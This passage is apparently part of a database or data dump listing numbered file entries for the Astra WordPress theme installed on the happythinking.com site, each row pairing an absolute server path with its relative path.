(2331, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/heading-colors/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/addons/heading-colors/dynamic-css/dynamic.css.php'),
(2332, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/scroll-to-top/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/addons/scroll-to-top/assets/js/minified/customizer-preview.min.js'),
(2333, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/scroll-to-top/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/addons/scroll-to-top/assets/js/unminified/customizer-preview.js'),
(2334, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/scroll-to-top/assets/js/unminified/scroll-to-top.js', 'wp-content/themes/astra/inc/addons/scroll-to-top/assets/js/unminified/scroll-to-top.js'),
(2335, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/scroll-to-top/class-astra-scroll-to-top.php', 'wp-content/themes/astra/inc/addons/scroll-to-top/class-astra-scroll-to-top.php'),
(2336, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/scroll-to-top/classes/class-astra-scroll-to-top-loader.php', 'wp-content/themes/astra/inc/addons/scroll-to-top/classes/class-astra-scroll-to-top-loader.php'),
(2337, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/scroll-to-top/classes/customizer/class-astra-scroll-to-top-configs.php', 'wp-content/themes/astra/inc/addons/scroll-to-top/classes/customizer/class-astra-scroll-to-top-configs.php'),
(2338, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/scroll-to-top/css/dynamic-css.php', 'wp-content/themes/astra/inc/addons/scroll-to-top/css/dynamic-css.php'),
(2339, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/scroll-to-top/css/static-css.php', 'wp-content/themes/astra/inc/addons/scroll-to-top/css/static-css.php'),
(2340, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/addons/transparent-header/assets/js/minified/customizer-preview.min.js'),
(2341, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/addons/transparent-header/assets/js/unminified/customizer-preview.js'),
(2342, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/class-astra-ext-transparent-header.php', 'wp-content/themes/astra/inc/addons/transparent-header/class-astra-ext-transparent-header.php'),
(2343, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/classes/class-astra-ext-transparent-header-loader.php', 'wp-content/themes/astra/inc/addons/transparent-header/classes/class-astra-ext-transparent-header-loader.php'),
(2344, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/classes/class-astra-ext-transparent-header-markup.php', 'wp-content/themes/astra/inc/addons/transparent-header/classes/class-astra-ext-transparent-header-markup.php'),
(2345, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/classes/class-astra-transparent-header-panels-and-sections.php', 'wp-content/themes/astra/inc/addons/transparent-header/classes/class-astra-transparent-header-panels-and-sections.php'),
(2346, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/classes/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/addons/transparent-header/classes/dynamic-css/dynamic.css.php'),
(2347, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/classes/dynamic-css/header-sections-dynamic.css.php', 'wp-content/themes/astra/inc/addons/transparent-header/classes/dynamic-css/header-sections-dynamic.css.php'),
(2348, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/classes/index.php', 'wp-content/themes/astra/inc/addons/transparent-header/classes/index.php'),
(2349, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/classes/sections/class-astra-customizer-colors-transparent-header-configs.php', 'wp-content/themes/astra/inc/addons/transparent-header/classes/sections/class-astra-customizer-colors-transparent-header-configs.php'),
(2350, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/classes/sections/class-astra-customizer-transparent-header-configs.php', 'wp-content/themes/astra/inc/addons/transparent-header/classes/sections/class-astra-customizer-transparent-header-configs.php'),
(2351, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/classes/sections/index.php', 'wp-content/themes/astra/inc/addons/transparent-header/classes/sections/index.php'),
(2352, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/index.php', 'wp-content/themes/astra/inc/addons/transparent-header/index.php'),
(2353, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/admin-functions.php', 'wp-content/themes/astra/inc/admin-functions.php'),
(2354, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/ast-builder-customizer-rtl.css', 'wp-content/themes/astra/inc/assets/css/ast-builder-customizer-rtl.css'),
(2355, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/ast-builder-customizer.css', 'wp-content/themes/astra/inc/assets/css/ast-builder-customizer.css'),
(2356, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/ast-elementor-editor-dark-rtl.css', 'wp-content/themes/astra/inc/assets/css/ast-elementor-editor-dark-rtl.css'),
(2357, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/ast-elementor-editor-dark.css', 'wp-content/themes/astra/inc/assets/css/ast-elementor-editor-dark.css'),
(2358, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/ast-elementor-editor-rtl.css', 'wp-content/themes/astra/inc/assets/css/ast-elementor-editor-rtl.css'),
(2359, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/ast-elementor-editor.css', 'wp-content/themes/astra/inc/assets/css/ast-elementor-editor.css'),
(2360, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/astra-admin-menu-settings-rtl.css', 'wp-content/themes/astra/inc/assets/css/astra-admin-menu-settings-rtl.css'),
(2361, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/astra-admin-menu-settings.css', 'wp-content/themes/astra/inc/assets/css/astra-admin-menu-settings.css'),
(2362, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/astra-notices-rtl.css', 'wp-content/themes/astra/inc/assets/css/astra-notices-rtl.css'),
(2363, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/astra-notices.css', 'wp-content/themes/astra/inc/assets/css/astra-notices.css'),
(2364, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/block-editor-styles-rtl.css', 'wp-content/themes/astra/inc/assets/css/block-editor-styles-rtl.css'),
(2365, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/block-editor-styles.css', 'wp-content/themes/astra/inc/assets/css/block-editor-styles.css'),
(2366, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/customizer-preview-rtl.css', 'wp-content/themes/astra/inc/assets/css/customizer-preview-rtl.css'),
(2367, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/customizer-preview.css', 'wp-content/themes/astra/inc/assets/css/customizer-preview.css'),
(2368, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/font-icon-picker-rtl.css', 'wp-content/themes/astra/inc/assets/css/font-icon-picker-rtl.css'),
(2369, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/font-icon-picker.css', 'wp-content/themes/astra/inc/assets/css/font-icon-picker.css'),
(2370, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/wp-editor-styles-rtl.css', 'wp-content/themes/astra/inc/assets/css/wp-editor-styles-rtl.css'),
(2371, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/wp-editor-styles.css', 'wp-content/themes/astra/inc/assets/css/wp-editor-styles.css'),
(2372, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/fonts/ast-logo.eot', 'wp-content/themes/astra/inc/assets/fonts/ast-logo.eot'),
(2373, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/fonts/ast-logo.svg', 'wp-content/themes/astra/inc/assets/fonts/ast-logo.svg'),
(2374, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/fonts/ast-logo.ttf', 'wp-content/themes/astra/inc/assets/fonts/ast-logo.ttf'),
(2375, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/fonts/ast-logo.woff', 'wp-content/themes/astra/inc/assets/fonts/ast-logo.woff'),
(2376, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/ai-logo.svg', 'wp-content/themes/astra/inc/assets/images/ai-logo.svg'),
(2377, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/astra-banner.png', 'wp-content/themes/astra/inc/assets/images/astra-banner.png'),
(2378, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/astra-logo.svg', 'wp-content/themes/astra/inc/assets/images/astra-logo.svg'),
(2379, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/astra.svg', 'wp-content/themes/astra/inc/assets/images/astra.svg'),
(2380, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/bb-logo.jpg', 'wp-content/themes/astra/inc/assets/images/bb-logo.jpg'),
(2381, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/custom-layout.svg', 'wp-content/themes/astra/inc/assets/images/custom-layout.svg'),
(2382, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/ele-logo.svg', 'wp-content/themes/astra/inc/assets/images/ele-logo.svg'),
(2383, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/gb-logo.svg', 'wp-content/themes/astra/inc/assets/images/gb-logo.svg'),
(2384, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/lightning-speed.svg', 'wp-content/themes/astra/inc/assets/images/lightning-speed.svg'),
(2385, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/page-header.svg', 'wp-content/themes/astra/inc/assets/images/page-header.svg'),
(2386, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/about-us.jpg', 'wp-content/themes/astra/inc/assets/images/starter-content/about-us.jpg'),
(2387, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/avatar.png', 'wp-content/themes/astra/inc/assets/images/starter-content/avatar.png'),
(2388, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/blog.svg', 'wp-content/themes/astra/inc/assets/images/starter-content/blog.svg'),
(2389, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/branding.jpg', 'wp-content/themes/astra/inc/assets/images/starter-content/branding.jpg'),
(2390, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/building.svg', 'wp-content/themes/astra/inc/assets/images/starter-content/building.svg'),
(2391, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/graphic.jpg', 'wp-content/themes/astra/inc/assets/images/starter-content/graphic.jpg'),
(2392, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/hero-img.svg', 'wp-content/themes/astra/inc/assets/images/starter-content/hero-img.svg'),
(2393, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/logo.png', 'wp-content/themes/astra/inc/assets/images/starter-content/logo.png'),
(2394, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/passionate.svg', 'wp-content/themes/astra/inc/assets/images/starter-content/passionate.svg'),
(2395, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/portfolio.svg', 'wp-content/themes/astra/inc/assets/images/starter-content/portfolio.svg'),
(2396, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/professional.svg', 'wp-content/themes/astra/inc/assets/images/starter-content/professional.svg'),
(2397, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/shopping-bag.svg', 'wp-content/themes/astra/inc/assets/images/starter-content/shopping-bag.svg'),
(2398, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/support.svg', 'wp-content/themes/astra/inc/assets/images/starter-content/support.svg'),
(2399, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/web.jpg', 'wp-content/themes/astra/inc/assets/images/starter-content/web.jpg'),
(2400, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/js/ast-parse-svg.js', 'wp-content/themes/astra/inc/assets/js/ast-parse-svg.js'),
(2401, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/js/ast-render-svg.js', 'wp-content/themes/astra/inc/assets/js/ast-render-svg.js'),
(2402, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/js/astra-admin-menu-settings.js', 'wp-content/themes/astra/inc/assets/js/astra-admin-menu-settings.js'),
(2403, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/js/block-editor-script.js', 'wp-content/themes/astra/inc/assets/js/block-editor-script.js'),
(2404, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/js/column-block-compatibility.js', 'wp-content/themes/astra/inc/assets/js/column-block-compatibility.js'),
(2405, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/js/custom-fields-priority.js', 'wp-content/themes/astra/inc/assets/js/custom-fields-priority.js'),
(2406, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/js/customizer-preview.js', 'wp-content/themes/astra/inc/assets/js/customizer-preview.js'),
(2407, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/blog/blog-config.php', 'wp-content/themes/astra/inc/blog/blog-config.php'),
(2408, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/blog/blog.php', 'wp-content/themes/astra/inc/blog/blog.php'),
(2409, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/blog/index.php', 'wp-content/themes/astra/inc/blog/index.php'),
(2410, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/blog/single-blog.php', 'wp-content/themes/astra/inc/blog/single-blog.php'),
(2411, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/class-astra-builder-loader.php', 'wp-content/themes/astra/inc/builder/class-astra-builder-loader.php'),
(2412, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/controllers/class-astra-builder-ui-controller.php', 'wp-content/themes/astra/inc/builder/controllers/class-astra-builder-ui-controller.php'),
(2413, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/controllers/class-astra-builder-widget-controller.php', 'wp-content/themes/astra/inc/builder/controllers/class-astra-builder-widget-controller.php'),
(2414, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/markup/class-astra-builder-footer.php', 'wp-content/themes/astra/inc/builder/markup/class-astra-builder-footer.php'),
(2415, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/markup/class-astra-builder-header.php', 'wp-content/themes/astra/inc/builder/markup/class-astra-builder-header.php'),
(2416, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/base/assets/js/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/base/assets/js/customizer-preview.js'),
(2417, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/base/dynamic-css/button/class-astra-button-component-dynamic-css.php', 'wp-content/themes/astra/inc/builder/type/base/dynamic-css/button/class-astra-button-component-dynamic-css.php'),
(2418, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/base/dynamic-css/html/class-astra-html-component-dynamic-css.php', 'wp-content/themes/astra/inc/builder/type/base/dynamic-css/html/class-astra-html-component-dynamic-css.php'),
(2419, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/base/dynamic-css/social/class-astra-social-component-dynamic-css.php', 'wp-content/themes/astra/inc/builder/type/base/dynamic-css/social/class-astra-social-component-dynamic-css.php'),
(2420, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/base/dynamic-css/widget/class-astra-widget-component-dynamic-css.php', 'wp-content/themes/astra/inc/builder/type/base/dynamic-css/widget/class-astra-widget-component-dynamic-css.php'),
(2421, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/class-astra-builder-base-dynamic-css.php', 'wp-content/themes/astra/inc/builder/type/class-astra-builder-base-dynamic-css.php'),
(2422, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/above-footer/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/builder/type/footer/above-footer/assets/js/minified/customizer-preview.min.js'),
(2423, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/above-footer/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/footer/above-footer/assets/js/unminified/customizer-preview.js'),
(2424, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/above-footer/class-astra-above-footer-component-loader.php', 'wp-content/themes/astra/inc/builder/type/footer/above-footer/class-astra-above-footer-component-loader.php'),
(2425, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/above-footer/class-astra-above-footer.php', 'wp-content/themes/astra/inc/builder/type/footer/above-footer/class-astra-above-footer.php'),
(2426, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/above-footer/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/builder/type/footer/above-footer/dynamic-css/dynamic.css.php'),
(2427, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/below-footer/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/builder/type/footer/below-footer/assets/js/minified/customizer-preview.min.js'),
(2428, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/below-footer/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/footer/below-footer/assets/js/unminified/customizer-preview.js'),
(2429, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/below-footer/class-astra-below-footer-component-loader.php', 'wp-content/themes/astra/inc/builder/type/footer/below-footer/class-astra-below-footer-component-loader.php'),
(2430, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/below-footer/class-astra-below-footer.php', 'wp-content/themes/astra/inc/builder/type/footer/below-footer/class-astra-below-footer.php'),
(2431, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/below-footer/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/builder/type/footer/below-footer/dynamic-css/dynamic.css.php'),
(2432, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/button/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/builder/type/footer/button/assets/js/minified/customizer-preview.min.js'),
(2433, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/button/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/footer/button/assets/js/unminified/customizer-preview.js'),
(2434, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/button/class-astra-footer-button-component-loader.php', 'wp-content/themes/astra/inc/builder/type/footer/button/class-astra-footer-button-component-loader.php'),
(2435, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/button/class-astra-footer-button-component.php', 'wp-content/themes/astra/inc/builder/type/footer/button/class-astra-footer-button-component.php'),
(2436, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/button/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/builder/type/footer/button/dynamic-css/dynamic.css.php'),
(2437, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/copyright/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/builder/type/footer/copyright/assets/js/minified/customizer-preview.min.js'),
(2438, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/copyright/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/footer/copyright/assets/js/unminified/customizer-preview.js'),
(2439, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/copyright/class-astra-footer-copyright-component-loader.php', 'wp-content/themes/astra/inc/builder/type/footer/copyright/class-astra-footer-copyright-component-loader.php'),
(2440, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/copyright/class-astra-footer-copyright-component.php', 'wp-content/themes/astra/inc/builder/type/footer/copyright/class-astra-footer-copyright-component.php'),
(2441, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/copyright/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/builder/type/footer/copyright/dynamic-css/dynamic.css.php'),
(2442, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/html/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/builder/type/footer/html/assets/js/minified/customizer-preview.min.js'),
(2443, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/html/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/footer/html/assets/js/unminified/customizer-preview.js'),
(2444, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/html/class-astra-footer-html-component-loader.php', 'wp-content/themes/astra/inc/builder/type/footer/html/class-astra-footer-html-component-loader.php'),
(2445, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/html/class-astra-footer-html-component.php', 'wp-content/themes/astra/inc/builder/type/footer/html/class-astra-footer-html-component.php'),
(2446, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/html/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/builder/type/footer/html/dynamic-css/dynamic.css.php'),
(2447, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/menu/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/builder/type/footer/menu/assets/js/minified/customizer-preview.min.js'),
(2448, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/menu/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/footer/menu/assets/js/unminified/customizer-preview.js'),
(2449, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/menu/class-astra-footer-menu-component-loader.php', 'wp-content/themes/astra/inc/builder/type/footer/menu/class-astra-footer-menu-component-loader.php'),
(2450, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/menu/class-astra-footer-menu-component.php', 'wp-content/themes/astra/inc/builder/type/footer/menu/class-astra-footer-menu-component.php'),
(2451, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/menu/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/builder/type/footer/menu/dynamic-css/dynamic.css.php'),
(2452, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/primary-footer/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/builder/type/footer/primary-footer/assets/js/minified/customizer-preview.min.js'),
(2453, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/primary-footer/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/footer/primary-footer/assets/js/unminified/customizer-preview.js'),
(2454, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/primary-footer/class-astra-primary-footer-component-loader.php', 'wp-content/themes/astra/inc/builder/type/footer/primary-footer/class-astra-primary-footer-component-loader.php'),
(2455, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/primary-footer/class-astra-primary-footer.php', 'wp-content/themes/astra/inc/builder/type/footer/primary-footer/class-astra-primary-footer.php'),
(2456, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/primary-footer/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/builder/type/footer/primary-footer/dynamic-css/dynamic.css.php'),
(2457, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/social-icon/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/builder/type/footer/social-icon/assets/js/minified/customizer-preview.min.js'),
(2458, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/social-icon/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/footer/social-icon/assets/js/unminified/customizer-preview.js'),
(2459, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/social-icon/class-astra-footer-social-icons-component-loader.php', 'wp-content/themes/astra/inc/builder/type/footer/social-icon/class-astra-footer-social-icons-component-loader.php'),
(2460, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/social-icon/class-astra-footer-social-icons-component.php', 'wp-content/themes/astra/inc/builder/type/footer/social-icon/class-astra-footer-social-icons-component.php'),
(2461, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/social-icon/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/builder/type/footer/social-icon/dynamic-css/dynamic.css.php'),
(2462, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/widget/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/builder/type/footer/widget/assets/js/minified/customizer-preview.min.js'),
(2463, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/widget/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/footer/widget/assets/js/unminified/customizer-preview.js'),
(2464, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/widget/class-astra-footer-widget-component-loader.php', 'wp-content/themes/astra/inc/builder/type/footer/widget/class-astra-footer-widget-component-loader.php'),
(2465, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/widget/class-astra-footer-widget-component.php', 'wp-content/themes/astra/inc/builder/type/footer/widget/class-astra-footer-widget-component.php'),
(2466, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/widget/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/builder/type/footer/widget/dynamic-css/dynamic.css.php'),
(2467, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/above-header/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/builder/type/header/above-header/assets/js/minified/customizer-preview.min.js'),
(2468, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/above-header/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/header/above-header/assets/js/unminified/customizer-preview.js'),
(2469, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/above-header/class-astra-above-header-loader.php', 'wp-content/themes/astra/inc/builder/type/header/above-header/class-astra-above-header-loader.php'),
(2470, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/above-header/class-astra-above-header.php', 'wp-content/themes/astra/inc/builder/type/header/above-header/class-astra-above-header.php'),
(2471, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/above-header/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/builder/type/header/above-header/dynamic-css/dynamic.css.php'),
(2472, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/account/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/builder/type/header/account/assets/js/minified/customizer-preview.min.js'),
(2473, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/account/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/header/account/assets/js/unminified/customizer-preview.js'),
(2474, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/account/class-astra-header-account-component-loader.php', 'wp-content/themes/astra/inc/builder/type/header/account/class-astra-header-account-component-loader.php'),
(2475, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/account/class-astra-header-account-component.php', 'wp-content/themes/astra/inc/builder/type/header/account/class-astra-header-account-component.php'),
(2476, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/account/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/builder/type/header/account/dynamic-css/dynamic.css.php'),
